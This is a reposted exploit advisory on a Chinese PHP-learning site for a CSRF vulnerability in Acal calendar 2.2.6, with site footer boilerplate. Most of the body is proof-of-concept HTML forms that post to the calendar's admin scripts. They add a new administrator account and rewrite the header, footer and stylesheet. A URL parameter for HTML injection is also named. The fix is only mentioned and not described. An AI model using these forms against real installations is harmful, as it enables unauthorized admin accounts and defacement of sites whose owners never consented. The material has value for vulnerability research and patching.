来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: [Acal calendar 2.2.6 CSRF Vulnerability]作者: [Number 7]下载地址: [http://sourceforge.net/projects/acalproj/files/latest/download?source=directory]影响版本: [2.2.6]测试平台: [Windo......
|
标题: [Acal calendar 2.2.6 CSRF Vulnerability]
作者: [Number 7] 下载地址: [http://sourceforge.net/projects/acalproj/files/latest/download?source=directory] 影响版本: [2.2.6] 测试平台: [Windows,Linux] ____________________________________________________________________________ 添加账号<br> <form method="post" action="http://localhost/ACal-2.2.6/calendar/admin/changelogin.php?action=add"><br> Username: <br> <input type="text" size="20" name="user" /><br> Password:<br> <input type="password" size="20" name="pass" /> <input type="submit" value="Add User" /></form> Edit/Add Header <form action="http:// www.2cto.com /ACal-2.2.6/calendar/admin/edit.php?edit=header" method="post"> <textarea cols="60" rows="14" name="header">Write New Header Here.</textarea> <input type="submit" value="Submit Changes" /> Edit/Add Footer <form action="http://localhost/ACal-2.2.6/calendar/admin/edit.php?edit=footer" method="post"> <textarea cols="60" rows="14" name="footer">Write New Footer Here.</textarea> <input type="submit" value="Submit Changes" /> </form> Style Options <form method="post" action="http://localhost/ACal-2.2.6/calendar/admin/style.php?edit=style"> <textarea name="stylesheet" cols="60" rows="20"></textarea> <input type="submit" value="Edit" /> HTML注射: http://localhost/ACal-2.2.6/calendar/calendar.php?year=Inject HTML Code here. ____________________________________________________________________________ www.2cto.com提供修复: 针对性修复 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
